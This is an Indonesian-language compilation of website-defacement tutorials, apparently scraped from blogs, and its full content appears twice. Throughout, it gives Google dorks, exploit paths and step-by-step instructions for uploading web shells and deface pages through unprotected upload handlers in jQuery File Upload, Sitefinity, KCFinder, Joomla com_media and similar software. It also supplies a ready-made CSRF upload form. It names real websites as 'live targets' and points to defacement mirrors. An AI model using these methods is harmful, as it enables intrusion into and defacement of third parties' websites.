DEFACE JQUERY FILE UPLOAD / FILE ARRAY
TUTORIAL DEFACE JQUERY FILE UPLOAD / FILE ARRAY
Saya kasih contoh 2 web dibawah ini vuln - LIVE TARGET
http://www.liberdadeshopping.com.br/dashboard/server/php/
http://www.samaraveras.com.br/dashboard/server/php/
dork :
lewat google gambar
inurl:/server/php/files/
inurl:/foto/server/php/files/
inurl:/images/server/php/files/
inurl:/admin/server/php/files/
entar lu buka gambarnya
lewat google bias
use your brain oke,, pokoknya exploit di /server/php/ ,, di /server/php muncul kaya gini nih biasanya -> files []
atau kalo gak muncul coba liat /server/php/index.php kalo not found gak vuln
Ini CSRF nya
<form method="POST" action=" target.co.il/.../server/php/ "enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
save as .html
1.Siapkan shell
2.Buka web yang vuln,, and copy urlnya target.co.il/../server/php/
3.paste url di CSRF
4.buka csrfnya pake (buka pake browser atau lu upload csrfnya ke web yang udah lu tanem shell)
5.udah lu buka kan?? nah tinggal upload shell lu aja ,,, bisa langsung atau lu bypas extensinya
6. tanda shell masuk yaitu ada tulisan
{"files":[{"name":"nama shell lu.php","size":29,"type":"application\/octet-stream","url":"http:\/\/target.co.il\/..\/server\/php\/files\/nama shell lu.php
akses shell di /server/php/files/
NB : apabila lu pas buka shell malah kedownload berarti webnya juga gak vuln
SEMOGA BERMANFAAT
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠCara1ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠ
Siapkan script sendiri..
1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialogs/documenteditordialog.aspx) tanpa buka tutup kurung! contoh http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search
7.selesai!!
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠCara2ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠ
Method/metode KCFinder
Inurl:/kcfinder/browse.php
Inurl:/Kcfinder/
Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html
Contoh:
https://basukiwater.com/kcfinder/browse.php
jadi
https://basukiwater.com/file/namasckamu.html
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara3ΠΠΠΠΠΠΠΠΠΠΠ
Deface Onion.to File Upload
Posted by ALL TUTOR CYBER Posted on 7:11 AM
Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut...
Dork : - inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php
Step By Step :
1. Dorking Dulu
2. Pilih Web Target
3. Pilih File yang mau di'upload
4. Tinggal klik Upload => Done 😆
Mudah Bukan ?! 😃
Contoh Target :
https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html
https://danwin1210.me/uploads/lopeyou.html
https://temp.xn--wda.fr/e719x8JgJ.html
Mirror?! 😆
https://www.defacer.id/296011.html
https://www.defacer.id/296024.html
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara4ΠΠΠΠΠΠΠΠΠΠΠ
Metode com media
Deface COM_MEDIA
Posted by ALL TUTOR CYBER Posted on 1:47 AM
Bahan :
1. Dork : - inurl:com_media site:com
- inurl:com_media intext:"Upload"
2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Upload'an : Format .txt 😁
Live Target : http://www.james-insurance.co.uk/
Step by Step :
gunakan Live Targert dulu untuk Uji Coba 😁
1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk
2. Pilih salah satu Web
3. Masukkan Exploit
http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
4. Lalu Upload file dalam tempat upload ( format .txt )
Akses shell ?
Tambahkan : /images/namafile.txt
contoh : http://www.james-insurance.co.uk/images/fac.txt
Nanti Jadi Gini Hasilnyaa..
Mudah Bukan?! Tinggal Upload ke Defacer.id 😁
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara5ΠΠΠΠΠΠΠΠΠΠΠΠ
[POC] Vulnerability Simplicity Of Upload
BadBoy 7 Januari 2012 Vuln 12 Comments 1,839 Views
Assalamualaikum sahabat BinusHacker
Sudah lama gak posting di sini, kali ini masih seputar DEFACE WEBSITE aja lah hehe.
Sesuai judul di atas, mari kita bahas bersama aja
Simplycity Of Upload, terdengar sangat hebat bukan ? haha.
Mendapatkan ini selal tidak sengaja, karena saya hanya memakai dork yang lumanyun.
#Step 1:
Dork: “Powered By: © Simplicity oF Upload”
#Step 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.
#Step 3:
Allowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)
#Step 4:
Preview: http://[situstargetkamu]/upload/[Your File]
#Step 5: Live Demo:
http://www.railfaneurope.net/pix/upload.php
http://www.formplas.com/upload/upload.php
*Di google masih banyak kok
Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya.
Kalau masih ada yang bingung ? komen aja, nanti langsung saya bales
Keep spirit brothers
.
Home: http://www.fikrifakhrezy.com/
FB: https://www.facebook.com/fikri.badboy
Twitter: https://www.twitter.com/fikri_badboy
Sekian dulu ya, semoga berhasil semua
Wassalamualaikum..
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara6ΠΠΠΠΠΠΠΠΠ
Deface Methode File Upload
Post Kali ini tentang Deface methode file upload cuman titip yaa enggak tebas index tutor bisa dilihat langsungdi bawah
TUTORIAL :
DORK : inurl:/examples/uploadbutton.html
1. Pastekan Dork Di google
2. Pilih Salah Satu Site Misal Saya Pilih Paling atas
3. Setelah di buka Tampilan akan seperti ini kemudian pilih upload lalu pilis script yang mau di upload
4. Setelah Memilih otomatis akan muncul link di samping tombol upload copy linknya (ctrl + a)
5. pastekan link yang kita dapat di belakang url web tsb misal www.dgmotor.com/Public/Plug/kindeditor-4.1.4/attached/file/20170818/20170818163648_24620.html
6. Dan Bisa Kita Lihat Hasilnya
7. Kalau kita pengen memperlihatkan ke orang lain bisa copy link di atasnya
Sekian Tutorial Dari saya semoga membantu :)
Tutor Deface Part I
*Hanya untuk pemula*
Siapkan script sendiri..
1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialogs/documenteditordialog.aspx) tanpa buka tutup kurung! contoh http://sitetarget.org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget.org/files/namascriptdefacekalian.html lalu klik search
7.selesai
Saya kasih contoh 2 web dibawah ini vuln - LIVE TARGET
http://www.liberdadeshopping.com.br/dashboard/server/php/
http://www.samaraveras.com.br/dashboard/server/php/
dork :
lewat google gambar
inurl:/server/php/files/
inurl:/foto/server/php/files/
inurl:/images/server/php/files/
inurl:/admin/server/php/files/
entar lu buka gambarnya
lewat google bias
use your brain oke,, pokoknya exploit di /server/php/ ,, di /server/php muncul kaya gini nih biasanya -> files []
atau kalo gak muncul coba liat /server/php/index.php kalo not found gak vuln
Ini CSRF nya
<form method="POST" action=" target.co.il/.../server/php/ "enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
save as .html
1.Siapkan shell
2.Buka web yang vuln,, and copy urlnya target.co.il/../server/php/
3.paste url di CSRF
4.buka csrfnya pake (buka pake browser atau lu upload csrfnya ke web yang udah lu tanem shell)
5.udah lu buka kan?? nah tinggal upload shell lu aja ,,, bisa langsung atau lu bypas extensinya
6. tanda shell masuk yaitu ada tulisan
{"files":[{"name":"nama shell lu.php","size":29,"type":"application\/octet-stream","url":"http:\/\/target.co.il\/..\/server\/php\/files\/nama shell lu.php
akses shell di /server/php/files/
NB : apabila lu pas buka shell malah kedownload berarti webnya juga gak vuln
SEMOGA BERMANFAAT
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠCara1ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠ
Siapkan script sendiri..
1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialogs/documenteditordialog.aspx) tanpa buka tutup kurung! contoh http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search
7.selesai!!
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠCara2ΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠΠ
Method/metode KCFinder
Inurl:/kcfinder/browse.php
Inurl:/Kcfinder/
Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html
Contoh:
https://basukiwater.com/kcfinder/browse.php
jadi
https://basukiwater.com/file/namasckamu.html
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara3ΠΠΠΠΠΠΠΠΠΠΠ
Deface Onion.to File Upload
Posted by ALL TUTOR CYBER Posted on 7:11 AM
Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut...
Dork : - inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php
Step By Step :
1. Dorking Dulu
2. Pilih Web Target
3. Pilih File yang mau di'upload
4. Tinggal klik Upload => Done 😆
Mudah Bukan ?! 😃
Contoh Target :
https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html
https://danwin1210.me/uploads/lopeyou.html
https://temp.xn--wda.fr/e719x8JgJ.html
Mirror?! 😆
https://www.defacer.id/296011.html
https://www.defacer.id/296024.html
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara4ΠΠΠΠΠΠΠΠΠΠΠ
Metode com media
Deface COM_MEDIA
Posted by ALL TUTOR CYBER Posted on 1:47 AM
Bahan :
1. Dork : - inurl:com_media site:com
- inurl:com_media intext:"Upload"
2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Upload'an : Format .txt 😁
Live Target : http://www.james-insurance.co.uk/
Step by Step :
gunakan Live Targert dulu untuk Uji Coba 😁
1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk
2. Pilih salah satu Web
3. Masukkan Exploit
http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
4. Lalu Upload file dalam tempat upload ( format .txt )
Akses shell ?
Tambahkan : /images/namafile.txt
contoh : http://www.james-insurance.co.uk/images/fac.txt
Nanti Jadi Gini Hasilnyaa..
Mudah Bukan?! Tinggal Upload ke Defacer.id 😁
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara5ΠΠΠΠΠΠΠΠΠΠΠΠ
[POC] Vulnerability Simplicity Of Upload
BadBoy 7 Januari 2012 Vuln 12 Comments 1,839 Views
Assalamualaikum sahabat BinusHacker
Sudah lama gak posting di sini, kali ini masih seputar DEFACE WEBSITE aja lah hehe.
Sesuai judul di atas, mari kita bahas bersama aja
Simplycity Of Upload, terdengar sangat hebat bukan ? haha.
Mendapatkan ini selal tidak sengaja, karena saya hanya memakai dork yang lumanyun.
#Step 1:
Dork: “Powered By: © Simplicity oF Upload”
#Step 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.
#Step 3:
Allowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)
#Step 4:
Preview: http://[situstargetkamu]/upload/[Your File]
#Step 5: Live Demo:
http://www.railfaneurope.net/pix/upload.php
http://www.formplas.com/upload/upload.php
*Di google masih banyak kok
Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya.
Kalau masih ada yang bingung ? komen aja, nanti langsung saya bales
Keep spirit brothers
.
Home: http://www.fikrifakhrezy.com/
FB: https://www.facebook.com/fikri.badboy
Twitter: https://www.twitter.com/fikri_badboy
Sekian dulu ya, semoga berhasil semua
Wassalamualaikum..
ΠΠΠΠΠΠΠΠΠΠΠΠΠΠcara6ΠΠΠΠΠΠΠΠΠ
Deface Methode File Upload
Post Kali ini tentang Deface methode file upload cuman titip yaa enggak tebas index tutor bisa dilihat langsungdi bawah
TUTORIAL :
DORK : inurl:/examples/uploadbutton.html
1. Pastekan Dork Di google
2. Pilih Salah Satu Site Misal Saya Pilih Paling atas
3. Setelah di buka Tampilan akan seperti ini kemudian pilih upload lalu pilis script yang mau di upload
4. Setelah Memilih otomatis akan muncul link di samping tombol upload copy linknya (ctrl + a)
5. pastekan link yang kita dapat di belakang url web tsb misal www.dgmotor.com/Public/Plug/kindeditor-4.1.4/attached/file/20170818/20170818163648_24620.html
6. Dan Bisa Kita Lihat Hasilnya
7. Kalau kita pengen memperlihatkan ke orang lain bisa copy link di atasnya
Sekian Tutorial Dari saya semoga membantu :)
Tutor Deface Part I
*Hanya untuk pemula*
Siapkan script sendiri..
1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialogs/documenteditordialog.aspx) tanpa buka tutup kurung! contoh http://sitetarget.org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget.org/files/namascriptdefacekalian.html lalu klik search
7.selesai
mode sitefinty w selalu gagal pas manggilnya
BalasHapus